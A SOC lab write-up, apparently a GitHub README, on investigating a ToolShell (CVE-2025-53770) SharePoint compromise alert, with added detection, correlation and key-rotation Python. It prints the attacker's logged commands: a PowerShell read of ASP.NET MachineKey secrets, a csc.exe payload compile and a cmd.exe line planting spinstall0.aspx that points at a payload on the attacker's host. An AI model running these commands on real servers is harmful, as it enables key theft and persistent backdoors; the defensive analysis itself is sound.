# LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell
## Introduction
In the LetsDefend lab I investigated a SharePoint zero-day called ToolShell (CVE-2025-53770). The scenario mimicked a real-world zero-day attack in which a malicious POST request bypassed authentication, ran PowerShell to steal MachineKeySection keys, compiled payload.exe, and dropped a web shell (spinstall0.aspx). I logged everything, analyzed the behavior, and contained the host. This README covers the attack process, the steps taken to abate the attack, and lessons learnt.
## Lab Overview
- Platform: LetsDefend Cyber Range
- Target: SharePoint Server (SharePoint01)
- CVE: CVE-2025-53770
- Objective: Analyze RCE, practice detection, and containment
## Tools Used:
- Windows PowerShell
- VirusTotal
- AbuseIPDB
- LetsDefend Log Management
- LetsDefend Endpoint Security
- Base64 Decoder
- LetsDefend Threat Intel
## The Alert
<img width="980" height="396" alt="image" src="https://github.com/user-attachments/assets/4ef826f1-2729-4e70-b93e-4b680453a328" />
This is a critical alert for suspicious activity that targeted Microsoft SharePoint's ToolPane.aspx with a large payload and a spoofed Referer. The CVE context is CVE-2025-53770, a critical SharePoint vulnerability exploited via a specially crafted POST request that lets unauthenticated attackers in; successful exploitation leads to remote code execution (RCE) on the server. I treated this as active and high-urgency and assumed a successful compromise until proven otherwise.
## A Brief Overview of SharePoint
Microsoft SharePoint is a platform for enterprise collaboration and document management: essentially a secure, organized hub for files, workflows, and internal web apps.
## Core Uses
- Document Management: Version control, audit trails, and file permissions
- Collaboration: Multiple users can co-edit and share documents
- Intranet / Portals: Internal news, HR policies, dashboards
- Workflows & Automation: Forms, approvals, and notifications
- Integration: Connects with Teams, Outlook, Office apps, and Power BI
## SharePoint Security Considerations
- Uses Active Directory or SSO for authentication
- Data encrypted at rest and in transit
- Web parts and layouts may be abused if misconfigured
- Regular patching is critical to defend against zero-day exploits
## What is CVE-2025-53770 (ToolShell)
A critical zero-day in Microsoft SharePoint Server that lets attackers run code remotely without authentication. It abuses insecure deserialization and often chains with other SharePoint flaws (CVE-2025-49704, CVE-2025-49706) for full system takeover. Rated CVSS 9.8 (Critical) and actively exploited in the wild.
## Attack Analysis with VirusTotal
I analyzed the sender's address (the source IP address) with VirusTotal.
Source IP Address: 107.191.58.76
<img width="903" height="461" alt="image" src="https://github.com/user-attachments/assets/0de7ece4-f15e-45ee-a09e-85cf10e9a858" />
From this I can see that 15/95 security vendors flagged this IP address as malicious, which already says a lot about the IP.
## IP Location
Next I looked up the location and reputation of the IP. This was done with the help of AbuseIPDB and, as shown below, the IP is known for hacking, brute-force, web app attacks, port scanning, and DNS poisoning.
<img width="682" height="634" alt="image" src="https://github.com/user-attachments/assets/fd467e0f-b8f4-4f3e-aa10-b17cf6339466" />
# Endpoint Analysis
As a SOC analyst working this case, one of the important steps is endpoint analysis. Since the IP is known for hacking, I searched Endpoint Security for the host named 'SharePoint01' for further analysis.
<img width="1523" height="752" alt="image" src="https://github.com/user-attachments/assets/601d0a0a-0348-4cc1-a18b-5700f1d6f804" />
After locating the host, I opened the terminal history to check the command line.
<img width="801" height="334" alt="image" src="https://github.com/user-attachments/assets/c30383e6-1f3a-451d-bd32-4d804bbd9c47" />
## Terminal History Command Line
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
## PowerShell flags: -nop -w hidden -e
- -nop = No profile (avoid profile scripts).
- -w hidden = start window hidden (stealth).
- -e <base64> = encoded command
## Command Line Findings with Base64 Decoder:
Because the payload was Base64-encoded, I decoded the command with a Base64 decoder, as shown below.
<img width="807" height="656" alt="image" src="https://github.com/user-attachments/assets/1816ed88-62fc-413b-b0b7-524c312e1e78" />
The user launched PowerShell from the system directory "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" with an encoded command containing an ASP.NET server-side C# script that:
- Uses reflection to load the System.Web assembly,
- Accesses the non-public MachineKeySection and calls a non-public method (GetApplicationConfig),
- Reads the web application’s MachineKey values (ValidationKey, DecryptionKey, etc.),
- Writes those keys to the HTTP response (i.e., exfiltrates them).
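The flags and the decoded script above are the two things an analyst has to recover from a process-creation log before the command can be judged. The following Python is an added example (not part of the lab or the original README) that reverses the `-e` encoding the way PowerShell defines it (UTF-16LE text, then Base64), records the `-nop` and `-w hidden` evasion flags, and flags the MachineKey identifiers this README found in the decoded payload. The sample command line is constructed: its script only names the identifiers and does nothing else, so the decoder has something realistic to flag without reproducing the lab's payload.

```python
"""Decode a PowerShell -EncodedCommand argument and flag MachineKey access.

Added example, not from the LetsDefend lab or the original README.
SAMPLE_SCRIPT / SAMPLE_CMDLINE are CONSTRUCTED illustrations.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")  # -w hidden
NO_PROFILE = re.compile(r"(?i)-nop(?:rofile)?\b")              # -nop

# Identifiers the README found in the decoded payload (MachineKey read-out).
MACHINEKEY_INDICATORS = (
    "MachineKeySection",
    "GetApplicationConfig",
    "ValidationKey",
    "DecryptionKey",
)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script behind -e/-enc, or None if absent or not decodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


@dataclass
class Verdict:
    hidden_window: bool
    no_profile: bool
    decoded: Optional[str]
    machinekey_hits: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # MachineKey access is suspicious on its own; so is a hidden encoded run.
        return bool(self.machinekey_hits) or (self.decoded is not None and self.hidden_window)


def analyse_cmdline(cmdline: str) -> Verdict:
    """Decode the command line and collect the evasion flags and indicator hits."""
    decoded = decode_encoded_command(cmdline)
    hits = [s for s in MACHINEKEY_INDICATORS if decoded and s.lower() in decoded.lower()]
    return Verdict(
        bool(HIDDEN_WINDOW.search(cmdline)),
        bool(NO_PROFILE.search(cmdline)),
        decoded,
        hits,
    )


# CONSTRUCTED sample: a harmless script that merely names the MachineKey
# identifiers, so the detector has something realistic to flag.
SAMPLE_SCRIPT = (
    "$t = 'System.Web.Configuration.MachineKeySection'\n"
    "Write-Output ($t + ' GetApplicationConfig ValidationKey DecryptionKey')\n"
)
SAMPLE_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-nop -w hidden -e " + encode_powershell(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    v = analyse_cmdline(SAMPLE_CMDLINE)
    print("decoded script:\n" + (v.decoded or "<none>"))
    print("hidden window:", v.hidden_window, "| no profile:", v.no_profile)
    print("MachineKey indicators:", v.machinekey_hits, "| suspicious:", v.suspicious)
```

Running the block decodes the constructed command and reports all four indicators; feeding it a real process-creation record (the full command-line field) is the same call. A command line with no `-e` argument, or one whose Base64 does not decode, yields `decoded=None` rather than an exception, so the check can run over every PowerShell event in a log without stopping on noise.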
## Capturing Payloads and Post-Exploitation Activities: /_layouts/15/ToolPane.aspx?...
The payload tries to read and leak the host's ASP.NET MachineKey, a secret that can be used to forge ViewState/deserialization tokens and enable authentication bypass and remote code execution. This matches the ToolShell exploitation pattern (MachineKey abuse).
Key indicators of compromise (IoCs) found in the command after Base64 decoding:
- The POST + large payload + this encoded command indicates the attacker likely attempted to create or execute such a server-side script via the ToolShell exploit path.
- Machine exposure and the alert trigger: the use of -encodedCommand + hidden window + Base64 payload indicates evasion and automated exploitation. Attackers frequently use -encodedCommand to hide payloads and avoid command-line logging patterns. Possession of the MachineKey lets an attacker create malicious ViewState or serialized payloads that the application will accept as valid, enabling authentication bypass and remote code execution on vulnerable SharePoint instances. For ToolShell (CVE-2025-53770), this is exactly the exploitation chain.
## CMD Execution & Exploitation
The attacker tried to access private configuration in order to exploit it, abusing .NET. From the Base64 decoder we can see System.Web.Configuration.MachineKeySection and GetApplicationConfig; MachineKeySection contains:
- The machine/app’s ValidationKey
- The machine/app’s DecryptionKey.
These keys are secrets used for protecting viewstate and forms authentication. Retrieving them is a direct attempt to obtain material that allows forging/validating serialized ASP.NET payloads → direct precondition for deserialization-based RCE.
## CMD COMMANDS FINDING:
Just THREE seconds after the command above, the attacker sent another command:
<img width="867" height="228" alt="image" src="https://github.com/user-attachments/assets/fa062dcf-3afc-4818-af88-f2d04be72bba" />
## Terminal History Command Line
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
## Findings
- The command shows the C# compiler (csc.exe) that ships with the .NET Framework. Its job is to take source code (.cs files) and compile it into a .NET assembly, usually an .exe or .dll.
- The attacker uploaded or created a C# source file (payload.cs) on the victim host, then used the built-in .NET compiler (csc.exe) to compile it into a Windows executable (payload.exe). This payload could be malware.
## ANOTHER CMD COMMANDS FINDING:
Just TWO seconds after the command above, the attacker sent another command:
<img width="892" height="344" alt="image" src="https://github.com/user-attachments/assets/16759736-fa70-47fc-9589-6edc3df6e2de" />
## Terminal History Command Line
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
"C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
## Findings
- The attacker used cmd.exe to create a new ASPX file (spinstall0.aspx) inside SharePoint's LAYOUTS directory by echoing an HTML form/object into that path.
- The injected ASPX contains an <object> with a Url="http://107.191.58.76/payload.exe", directing the server or a visitor to that remote payload.
- Placing the file under ...\TEMPLATE\LAYOUTS\ makes it available via the SharePoint web application (a persistent web-accessible backdoor/dropper).
- This indicates attempted remote delivery/execution of payload.exe from the attacker-controlled host (107.191.58.76) and is a clear sign of compromise and persistence threat.
## ANOTHER CMD COMMANDS FINDING:
Just FIVE seconds after the command above, the attacker sent another command:
<img width="893" height="328" alt="image" src="https://github.com/user-attachments/assets/29ddde52-ce41-40cb-91b8-755962796d35" />
## Terminal History Command Line
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
## Findings
- Executed PowerShell again to call System.Web.Configuration.MachineKeySection.GetApplicationConfig(), which reads the application's MachineKey configuration.
- That retrieves the ValidationKey/DecryptionKey used to sign/encrypt ViewState and auth tokens, material an attacker can use to forge serialized payloads and bypass authentication.
- This is a clear, consistent reconnaissance/exfiltration step in a ToolShell-style exploit chain (preparation for RCE) that was manually invoked.
This activity shows a consistent pattern; I treated the host as compromised with high confidence and collected forensic artifacts immediately.
## Threat Intel
After gathering all the commands and findings, I did further research in Threat Intel, searching by data type IP. The data source shows OnlyHunt with the tag CVE-2025-53770, and the Referer /_layouts/SignOut.aspx seen in the alert investigation channel shows that a legitimate SharePoint page was spoofed (or used and then signed out of) to make the request appear to originate from a normal SharePoint action.
At that point, I contained the host.
<img width="954" height="564" alt="image" src="https://github.com/user-attachments/assets/d87d552c-f0d7-4983-8147-4aabcb9346ec" />
## IoC (Artifacts)
- IP 107.191.58.76: Attacker source IP observed sending exploit POST
- /_layouts/15/ToolPane.aspx?DisplayMode=Edit: Type "url". Exploit endpoint targeted by POST
- Spinstall0.aspx: Type "filename". Deployed malicious ASPX backdoor filename
- MachineKeySection: Type "string". ASPX code string indicating MachineKey exfiltration
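The IoCs above, together with the three-, two- and five-second gaps between the commands, describe a chain rather than four unrelated events, and that is what a detection rule should look for. The Python below is an added example (not the lab's or the README's own code) that encodes each artifact as a rule over a web-server or process-creation record and raises an alert only when two or more distinct rules fire on the same host within a short window. The event records and their timestamps are constructed to follow the timeline in this writeup; the Base64 token in the encoded PowerShell event is a placeholder, not the lab's payload.

```python
"""Correlate ToolShell-style artifacts on one host into a single alert.

Added example, not from the LetsDefend lab or the original README.
SAMPLE_EVENTS are CONSTRUCTED to mirror the timeline described in the writeup.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Callable, Dict, List


@dataclass
class Event:
    ts: datetime
    host: str
    kind: str    # "http" (web-server log) or "process" (process-creation log)
    image: str   # executable path for process events, "" for http events
    detail: str  # request line + referer for http, full command line for process


def _proc(e: Event, exe: str) -> bool:
    return e.kind == "process" and e.image.lower().endswith(exe)


RULES: Dict[str, Callable[[Event], bool]] = {
    # Exploit POST to the ToolPane endpoint carrying the spoofed SignOut referer.
    "toolpane_post": lambda e: (
        e.kind == "http"
        and re.search(r"(?i)^POST /_layouts/15/ToolPane\.aspx\?DisplayMode=Edit", e.detail) is not None
        and re.search(r"(?i)\breferer=\S*/_layouts/SignOut\.aspx", e.detail) is not None
    ),
    # powershell.exe launched with an encoded command (-e / -enc / -EncodedCommand).
    "encoded_powershell": lambda e: (
        _proc(e, "powershell.exe")
        and re.search(r"(?i)\s-(?:e|ec|en|enc|encoded|encodedcommand)\s+[A-Za-z0-9+/=]+", e.detail) is not None
    ),
    # Direct read of the ASP.NET MachineKey configuration from PowerShell.
    "machinekey_read": lambda e: (
        _proc(e, "powershell.exe")
        and re.search(r"(?i)MachineKeySection|GetApplicationConfig", e.detail) is not None
    ),
    # csc.exe compiling an executable out of a Temp directory.
    "csc_temp_compile": lambda e: (
        _proc(e, "csc.exe") and re.search(r"(?i)/out:\S*\\temp\\", e.detail) is not None
    ),
    # A shell redirecting output into an .aspx file under TEMPLATE\LAYOUTS.
    "aspx_drop_in_layouts": lambda e: (
        _proc(e, "cmd.exe")
        and re.search(r"(?i)>\s*[^<>|]*\\TEMPLATE\\LAYOUTS\\[^<>|]*\.aspx", e.detail) is not None
    ),
}


def correlate(events: List[Event], window: timedelta = timedelta(seconds=60)) -> List[dict]:
    """Cluster rule hits per host (consecutive hits no more than `window` apart)
    and emit an alert for every cluster that contains at least two distinct rules."""
    hits = [(e.ts, e.host, name) for e in events for name, rule in RULES.items() if rule(e)]
    hits.sort(key=lambda h: (h[1], h[0], h[2]))  # group by host, then by time
    alerts: List[dict] = []
    cluster: List[tuple] = []

    def flush() -> None:
        names = sorted({n for _, _, n in cluster})
        if len(names) >= 2:
            alerts.append({"host": cluster[0][1], "start": cluster[0][0],
                           "end": cluster[-1][0], "rules": names, "events": len(cluster)})

    for hit in hits:
        if cluster and (hit[1] != cluster[-1][1] or hit[0] - cluster[-1][0] > window):
            flush()
            cluster = []
        cluster.append(hit)
    if cluster:
        flush()
    return alerts


# CONSTRUCTED sample timeline: one benign event, the chain from the writeup,
# and a developer build on another host that must not alert.
T = lambda s: datetime.fromisoformat("2025-07-22T" + s)
SP = "SharePoint01"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
SAMPLE_EVENTS = [
    Event(T("09:00:00"), SP, "process", PS, f'"{PS}" -Command Get-Date'),  # benign admin use
    Event(T("13:07:00"), SP, "http", "",
          "POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit referer=/_layouts/SignOut.aspx status=200"),
    Event(T("13:07:01"), SP, "process", PS, f'"{PS}" -nop -w hidden -e QQBBAEEA'),  # placeholder token
    Event(T("13:07:04"), SP, "process", CSC,
          f'"{CSC}" /out:C:\\Windows\\Temp\\payload.exe C:\\Windows\\Temp\\payload.cs'),
    Event(T("13:07:06"), SP, "process", r"C:\Windows\System32\cmd.exe",
          r'"C:\Windows\System32\cmd.exe" /c echo <form runat="server"></form> > '
          r'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx'),
    Event(T("13:07:11"), SP, "process", PS,
          f'"{PS}" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"'),
    Event(T("15:30:00"), "DEVBOX", "process", CSC, f'"{CSC}" /out:C:\\build\\app.exe C:\\src\\app.cs'),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Each rule on its own is noisy (developers run csc.exe, administrators run PowerShell), which is why the alert requires at least two distinct rules in the same window; the constructed DEVBOX build and the morning PowerShell session therefore produce nothing, while the eleven-second chain on SharePoint01 produces one alert listing all five artifacts.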
# My Analysis Note and summary
## Analyst Note — SOC342 (CVE-2025-53770 / ToolShell) — SharePoint01
Date/Time: 2025-07-22 13:07 (event)
Analyst: [YourName]
Case ID: SOC342
Host: SharePoint01
Severity: Critical
## SUMMARY
I spotted a critical zero-day exploitation attempt at 2025-07-22 13:07, ToolShell (CVE-2025-53770), against an on-premises SharePoint Server with host name SharePoint01. The attacker, from a known malicious IP (107.191.58.76) that is both the source of the POST and the payload host, bypassed authentication to run remote code on the server.
The attacker uploaded/created spinstall0.aspx in the SharePoint LAYOUTS directory and executed PowerShell to read ASP.NET MachineKey material and to compile a C# payload via csc.exe, allowing them to craft payloads the application trusts.
This activity is consistent with web-shell deployment (spinstall0.aspx in SharePoint), MachineKey exfiltration, and on-host payload compilation, all high-confidence indicators of compromise.
## UPDATING MY PLAYBOOK ANALYST NOTE
<img width="758" height="479" alt="image" src="https://github.com/user-attachments/assets/a6f54a9c-66c0-400c-9d8b-895fee714bca" />
<img width="1381" height="292" alt="image" src="https://github.com/user-attachments/assets/69245d07-d3dc-496b-8906-e928b06179a7" />
## RECOMMENDED STEPS TO BE TAKEN TO ABATE THE ATTACKER ACTIVITIES:
After discovering the compromise, I recommended in the Analyst Note that the following steps be taken:
1. Contain: If authorized, isolate SharePoint01 from network; if not, maintain outbound egress restrictions and block attacker IPs/clusters.
2. Hunt: Search all SharePoint servers for the same indicators and ensure adequate backups.
3. Eradicate: Remove confirmed malicious files and any unauthorized scheduled tasks/services; inspect for additional persistence.
4. Mitigate: Rotate ASP.NET/MachineKey values and apply Microsoft July 2025 emergency patches to all on-prem SharePoint instances. Coordinate rotation with application owners.
5. Detect & Prevent: Deploy/add detection rules and hunt across environment for similar activity.
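Step 4 is the one that actually invalidates what the attacker stole: once the ValidationKey and DecryptionKey have been read out, patching alone leaves any ViewState forged with them valid. The Python below is an added example (not the lab's or the README's own code, and not Microsoft's tooling) that models the ASP.NET `<machineKey>` element, audits it for settings that are unfit after an incident, generates replacement keys from the OS CSPRNG, and confirms that the new element no longer shares a key with the old one. The minimum key lengths and the list of legacy algorithms are assumptions stated in the code; the compromised element is constructed.

```python
"""Audit and rotate an ASP.NET <machineKey> element after key exfiltration.

Added example, not from the LetsDefend lab or the original README.
COMPROMISED_EXAMPLE is CONSTRUCTED; the length policy and the legacy-algorithm
lists below are assumptions, not quoted from Microsoft documentation.
"""
import re
import secrets
import xml.etree.ElementTree as ET
from typing import Dict, List

WEAK_VALIDATION = {"MD5", "SHA1"}      # assumed: legacy validation algorithms
WEAK_DECRYPTION = {"3DES", "DES"}      # assumed: legacy decryption algorithms
VALIDATION_KEY_BYTES = 64              # 128 hex chars (assumed minimum policy)
DECRYPTION_KEY_BYTES = 32              # 64 hex chars = AES-256 (assumed minimum policy)
HEX = re.compile(r"^[0-9A-Fa-f]+$")


def generate_keys() -> Dict[str, str]:
    """Fresh random keys from the OS CSPRNG, upper-case hex as web.config expects."""
    return {
        "validationKey": secrets.token_hex(VALIDATION_KEY_BYTES).upper(),
        "decryptionKey": secrets.token_hex(DECRYPTION_KEY_BYTES).upper(),
    }


def render_machine_key(keys: Dict[str, str], validation: str = "HMACSHA256",
                       decryption: str = "AES") -> str:
    """Serialize a <machineKey .../> element with explicit keys and algorithms."""
    el = ET.Element("machineKey", {
        "validationKey": keys["validationKey"],
        "decryptionKey": keys["decryptionKey"],
        "validation": validation,
        "decryption": decryption,
    })
    return ET.tostring(el, encoding="unicode")


def parse_machine_key(xml: str) -> Dict[str, str]:
    el = ET.fromstring(xml)
    if el.tag != "machineKey":
        raise ValueError("not a <machineKey> element")
    return dict(el.attrib)


def audit(xml: str) -> List[str]:
    """Return findings that make the element unfit for a post-incident state."""
    a = parse_machine_key(xml)
    findings: List[str] = []
    for name, min_bytes in (("validationKey", VALIDATION_KEY_BYTES),
                            ("decryptionKey", DECRYPTION_KEY_BYTES)):
        v = a.get(name, "")
        if v.startswith("AutoGenerate"):
            # Auto-generated keys are per machine: they cannot be shared across
            # a farm and a rotation cannot be verified from the config.
            findings.append(f"{name}: AutoGenerate cannot be shared across a farm or verified as rotated")
        elif not HEX.match(v):
            findings.append(f"{name}: missing or not a hex string")
        elif len(v) < 2 * min_bytes:
            findings.append(f"{name}: {len(v)} hex chars, below the assumed minimum of {2 * min_bytes}")
    if a.get("validation", "").upper() in WEAK_VALIDATION:
        findings.append(f"validation={a['validation']}: legacy algorithm, use HMACSHA256 or stronger")
    if a.get("decryption", "").upper() in WEAK_DECRYPTION:
        findings.append(f"decryption={a['decryption']}: legacy algorithm, use AES")
    return findings


def keys_rotated(old_xml: str, new_xml: str) -> bool:
    """True only if both keys differ between the two elements."""
    o, n = parse_machine_key(old_xml), parse_machine_key(new_xml)
    return (o.get("validationKey") != n.get("validationKey")
            and o.get("decryptionKey") != n.get("decryptionKey"))


def rotate(xml: str) -> str:
    """Replace both keys, upgrading any legacy algorithm while we are at it."""
    a = parse_machine_key(xml)
    validation = a.get("validation", "HMACSHA256")
    decryption = a.get("decryption", "AES")
    if validation.upper() in WEAK_VALIDATION:
        validation = "HMACSHA256"
    if decryption.upper() in WEAK_DECRYPTION:
        decryption = "AES"
    new_xml = render_machine_key(generate_keys(), validation, decryption)
    if not keys_rotated(xml, new_xml):  # cannot happen with a CSPRNG, but check anyway
        raise RuntimeError("rotation produced an unchanged key")
    return new_xml


# CONSTRUCTED: a short-keyed, legacy-algorithm element standing in for the
# configuration whose keys were read out during the incident.
COMPROMISED_EXAMPLE = (
    '<machineKey validationKey="' + "AB" * 32 + '" decryptionKey="' + "CD" * 12
    + '" validation="SHA1" decryption="3DES" />'
)

if __name__ == "__main__":
    for finding in audit(COMPROMISED_EXAMPLE):
        print("finding:", finding)
    print(rotate(COMPROMISED_EXAMPLE))
```

The element this produces is the web.config form of the keys; in a SharePoint farm every server must carry the same explicit keys, so the rotation has to be applied farm-wide and in coordination with the application owners named in step 4 (SharePoint ships its own cmdlet for this, Update-SPMachineKey, which is the supported path rather than editing web.config by hand). The `audit` check is also useful before the rotation as a hunt: an element still carrying the old keys after the rotation was declared complete is a server that was missed.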
File snapshot
[4.0K] /data/pocs/bfc7ba4b9942e5e9b69b3cb388266188cd220deb
├── [ 723] DISCLAIMER.md
└── [ 14K] README.md
0 directories, 2 files